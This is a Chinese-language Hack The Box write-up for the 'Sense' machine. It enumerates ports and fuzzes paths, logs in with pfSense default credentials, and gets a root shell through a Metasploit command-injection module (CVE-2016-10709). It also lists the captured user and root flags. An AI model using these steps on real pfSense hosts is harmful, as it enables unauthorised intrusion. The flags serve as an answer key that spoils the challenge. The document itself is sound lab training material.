0
点赞
收藏
分享

微信扫一扫

疯狂Java讲义——第4章 流程控制与数组

开源GIS定制化开发方案 2024-11-06 阅读 6
网络安全

目录

连接至HTB服务器并启动靶机

1.What is the name of the webserver running on port 80 and 443 according to nmap?

使用nmap对靶机TCP端口进行开放扫描

2.What is the name of the application that presents a login screen on port 443?

使用浏览器访问靶机80端口

3.What txt file can be found on the webserver that contains user information?

使用ffuf对靶机进行路径FUZZ

使用curl访问system-users.txt文件

4.What is the username found in the system-users.txt file?

5.What is the default password for a pfsense installation?

使用浏览器搜索pfsense默认凭证

6.What version of pfSense is running on Sense?

使用上文凭证对网页进行登陆后进入到仪表盘

7.What 2016 CVE ID describes a command injection vulnerability in a PHP page on pfSense via a GET parameter?

使用searchsploit搜索pfsense当前版本相关漏洞EXP、PoC

尝试利用该非预期EXP

启动Metasploit

8.Submit the flag located in the rohit user's home directory.

9.Submit the flag located in root's home directory.

USER_FLA:8721327cc232073b40d27d9c17e7348b

ROOT_FLAG:d08c32a5d4f8c8b10e76eb51a69f1a86


连接至HTB服务器并启动靶机


1.What is the name of the webserver running on port 80 and 443 according to nmap?

使用nmap对靶机TCP端口进行开放扫描

nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.10.60

对靶机开放TCP端口进行脚本服务信息扫描

nmap -p 80,443 -sCV 10.10.10.60

由nmap扫描结果可知,80端口与443端口托管服务:lighttpd


2.What is the name of the application that presents a login screen on port 443?

使用浏览器访问靶机80端口

显示在屏幕上的应用程序为:pfsense


3.What txt file can be found on the webserver that contains user information?

使用ffuf对靶机进行路径FUZZ

ffuf -u https://10.10.10.60/FUZZ -w ../dictionary/common.txt -t 200 -fs 6690 

这里扫出来的东西太少了,因为字典不给力的原因这次换个大的扫描敏感文件

ffuf -u https://10.10.10.60/FUZZ -w Half-Dir.txt  -e .txt -t 100 

使用curl访问system-users.txt文件

curl -k https://10.10.10.60/system-users.txt

4.What is the username found in the system-users.txt file?

获取到账户名:Rohit


5.What is the default password for a pfsense installation?

使用浏览器搜索pfsense默认凭证

由搜索可知pfsense默认密码为:pfsense


6.What version of pfSense is running on Sense?

使用上文凭证对网页进行登陆后进入到仪表盘

由展示内容可知,pfsense版本为:2.1.3-RELEASE


7.What 2016 CVE ID describes a command injection vulnerability in a PHP page on pfSense via a GET parameter?

使用searchsploit搜索pfsense当前版本相关漏洞EXP、PoC

searchsploit pfsense 2.1.3

将该EXP拷贝到当前目录下

searchsploit -m 43560.py

由模块描述可知,该EXP基于漏洞:CVE-2014-4688。往上交发现答案不对


尝试利用该非预期EXP

利用失败,转向MSF走预期EXP

启动Metasploit

msfconsole

搜索pfsense相关利用模块

search pfsense

切换到EXP模块

use exploit/unix/http/pfsense_graph_injection_exec

展示该模块信息

info

由展示信息可知,该模块基于漏洞:CVE-2016-10709


8.Submit the flag located in the rohit user's home directory.

9.Submit the flag located in root's home directory.

列出该模块可填选项

show options

我们需要填好的选项有:LHOST、LPORT、RHOSTS、USERNAME

(少见的不需要提权直接拿到ROOT的靶机)

想搜索一下user_flag和root_flag发现根本找不到

切换到终端

shell

查找user_flag、root_flag位置并查看其内容

USER_FLA:8721327cc232073b40d27d9c17e7348b

ROOT_FLAG:d08c32a5d4f8c8b10e76eb51a69f1a86

举报

相关推荐

0 条评论